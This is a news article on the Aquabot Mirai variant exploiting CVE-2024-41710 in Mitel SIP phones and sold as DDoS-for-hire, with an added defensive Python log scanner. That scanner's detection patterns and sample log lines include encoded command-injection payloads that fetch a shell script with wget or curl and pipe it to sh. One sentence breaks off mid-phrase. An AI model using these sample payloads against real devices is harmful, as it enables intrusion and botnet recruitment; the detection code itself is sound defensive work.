2025-01-29
A new variant of the notorious Mirai botnet, dubbed Aquabot, is on the rise, exploiting vulnerabilities in Mitel SIP phones to launch powerful distributed denial-of-service (DDoS) attacks. This version brings with it a fresh approach to the botnet’s operations, including a DDoS-as-a-service model marketed through platforms like Telegram. Researchers have uncovered alarming details about how the botnet leverages flaws in Mitel devices, especially targeting the CVE-2024-41710 vulnerability. The new variant adds enhanced persistence mechanisms and the ability to communicate with command-and-control (C2) systems. With this development, Aquabot is shaping up to be a significant player in the world of DDoS attacks, furthering concerns about the security of Internet of Things (IoT) devices.
The Aquabot Threat
The Mirai botnet, already infamous for its involvement in DDoS attacks, has introduced a new variant, Aquabot. This iteration exploits a critical vulnerability in Mitel SIP phones, specifically CVE-2024-41710. Discovered by the Akamai Security Intelligence and Response Team (SIRT), the flaw allows attackers to gain root access to vulnerable devices and conscript them into DDoS attacks. The vulnerability arises from an input sanitization flaw in the device firmware.
Aquabotv3, as
What sets Aquabot apart is its promotion as a DDoS-as-a-service platform, marketed through Telegram channels under various names such as Cursinq Firewall and The Eye Services. It offers Layer 4 and Layer 7 DDoS capabilities and encourages attackers to utilize it for their malicious campaigns.
Akamai’s researchers also noted that Aquabotv3 has been active in exploiting Mitel phone vulnerabilities since January 2025. The exploit uses a payload that fetches a shell script to install Mirai malware on compromised devices, which can then be used in DDoS operations. The malware is versatile, supporting multiple architectures, including x86 and ARM.
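The infection chain described above, a payload that fetches a shell script and hands it to a shell, leaves a recognisable trace in the web-server, proxy or IDS logs in front of a device. The following is an added example, not code from this article or from Akamai's report: a Python heuristic that URL-decodes HTTP request lines and flags download-and-execute patterns (a fetch tool piped into `sh`, a fetch followed by `chmod`/execution, or a bare `.sh` URL inside a parameter). The log lines, IP addresses, paths and parameter names are constructed for illustration and do not represent the real Mitel endpoint or the actual Aquabot payload.

```python
"""Heuristic detection of download-and-execute injection attempts in HTTP logs.

Added illustration only: the request format, paths and sample lines below are
constructed and are not taken from the Mitel advisory or the Akamai write-up.
"""
import re
from urllib.parse import unquote_plus

# Indicators that a fetched script is being piped into or executed by a shell.
# Order matters only for the stable order of indicator names in the result.
DOWNLOAD_EXEC_PATTERNS = [
    # e.g. "wget http://host/x.sh -O- | sh"
    ("pipe_to_shell", re.compile(r"\b(?:wget|curl|tftp)\b[^|;&]*\|\s*(?:ba)?sh\b")),
    # e.g. "curl http://host/a.sh; chmod +x a.sh; ./a.sh"
    ("fetch_then_run", re.compile(
        r"\b(?:wget|curl|tftp)\b.*?(?:;|&&)\s*(?:chmod\s+\+?[0-7x]+|\.?/\S+|sh\s+\S+)")),
    # a URL ending in .sh anywhere in the decoded request
    ("script_url", re.compile(r"https?://\S+\.sh\b")),
]

# Constructed combined-log-style format: an optional trailing quoted field
# carries the (already logged) request body, which many reverse proxies can emit.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+(?: "(?P<body>[^"]*)")?'
)

# Constructed sample lines. 198.51.100.23 sends two injection-style requests.
SAMPLE_LOG = [
    '203.0.113.10 - - [29/Jan/2025:08:00:01 +0000] "GET /login.html HTTP/1.1" 200 1432',
    '203.0.113.10 - - [29/Jan/2025:08:00:05 +0000] "POST /api/settings HTTP/1.1" 200 88 '
    '"name=phone1&tz=UTC"',
    '198.51.100.23 - - [29/Jan/2025:08:01:17 +0000] "POST /api/settings HTTP/1.1" 200 88 '
    '"name=x%3Bwget+http%3A%2F%2F192.0.2.5%2Fbins.sh+-O-+%7C+sh"',
    '198.51.100.23 - - [29/Jan/2025:08:01:20 +0000] '
    '"GET /cgi?cmd=curl+http%3A%2F%2F192.0.2.5%2Fa.sh%3Bchmod+%2Bx+a.sh%3B.%2Fa.sh HTTP/1.1" 500 0',
]


def parse_line(line):
    """Parse one log line into a dict; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Decode %XX and '+' so that encoded metacharacters (%7C -> '|', %3B -> ';')
    # become visible to the pattern matcher.
    rec["decoded"] = unquote_plus(rec["req"] + " " + (rec["body"] or ""))
    return rec


def classify(decoded_request):
    """Return the names of all download-and-execute indicators found in the text."""
    return [name for name, pat in DOWNLOAD_EXEC_PATTERNS if pat.search(decoded_request)]


def scan_log(lines):
    """Run the heuristics over every parseable line and return a list of alerts."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skip rather than guess
        hits = classify(rec["decoded"])
        if hits:
            alerts.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "indicators": hits,
                "request": rec["decoded"],
            })
    return alerts


def summarize_by_source(alerts):
    """Count alerts per source address, useful for prioritising which host to block."""
    counts = {}
    for a in alerts:
        counts[a["ip"]] = counts.get(a["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(f"{a['ts']} {a['ip']} {','.join(a['indicators'])}: {a['request']}")
    print("per-source:", summarize_by_source(found))
```

The matcher works on the decoded request rather than the raw line so that percent-encoded pipes and semicolons are not missed, which is the usual evasion for signature-based filters. It is deliberately a heuristic, not a signature for the specific Mitel flaw: it will also fire on any other injection attempt that follows the same fetch-and-run shape, and it will produce false positives on legitimate endpoints that accept shell-like text, so the output should feed triage, not automatic blocking.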
The botnet’s continued success in exploiting IoT devices underscores the importance of proper security measures for such devices, as they often suffer from weak or default security configurations.
What Undercode Says:
The emergence of Aquabot and its exploitation of the Mitel vulnerability is yet another example of how botnet operators continue to evolve their methods and target weaknesses in IoT devices. By leveraging a known vulnerability in Mitel SIP phones, Aquabot demonstrates how even widely used corporate devices can become the entry point for large-scale attacks. The ongoing success of the Mirai family of botnets, particularly its variants like Aquabot, points to the persistent and growing threat of DDoS attacks in our increasingly connected world.
The exploitation of CVE-2024-41710 highlights a crucial issue in the security of VoIP devices. While many organizations focus on securing more traditional IT infrastructure, they often overlook the vulnerabilities within their networked communication systems like SIP phones, which are now increasingly targeted by attackers. This vulnerability allows attackers to gain root access to the device, which gives them full control over its operations. The exploitation of such flaws is not just an academic concern; it can have a real-world impact, especially in corporate environments where these devices are used for critical communications.
Aquabotv3 introduces some interesting new features, including the ability to report back to the attacker’s C2 when a kill signal is detected. Although no response has been seen from the C2, this feature is an indication of how botnets are becoming more sophisticated and capable of responding to commands in real-time. This dynamic approach to botnet control allows the attacker to maintain a constant presence and adapt to defenses.
Moreover, the DDoS-as-a-service model being promoted by the Aquabot operators is especially concerning. By offering DDoS capabilities through Telegram, these threat actors are lowering the barrier to entry for aspiring cybercriminals. In the past, launching a DDoS attack required significant resources and technical expertise, but now, anyone can rent botnet services to carry out large-scale attacks. This shift democratizes DDoS attacks and could lead to an increase in attacks from less-skilled individuals who may not have a full understanding of the consequences.
The role of IoT devices in these botnets cannot be overstated. IoT devices are particularly vulnerable because many of them lack proper security features or are left with default configurations. The fact that these devices are often at the end of their service life or never updated makes them prime targets for botnets like Mirai and its variants. Attackers can easily exploit these vulnerabilities to build large botnets that are used for various malicious purposes, including launching DDoS attacks. This highlights a critical need for organizations to take proactive steps in securing their IoT devices, especially in corporate environments where sensitive data and communications are involved.
In conclusion, the continued evolution of the Mirai botnet and the rise of DDoS-as-a-service platforms like Aquabot signal that the threat landscape is becoming more complex and accessible. Organizations need to ensure that their IoT devices are secure, updated, and properly configured to avoid falling victim to such attacks. As botnets grow in sophistication and availability, it is essential for businesses and individuals to stay vigilant and invest in securing their networks and devices against these persistent threats.
References:
Reported By: Darkreading.com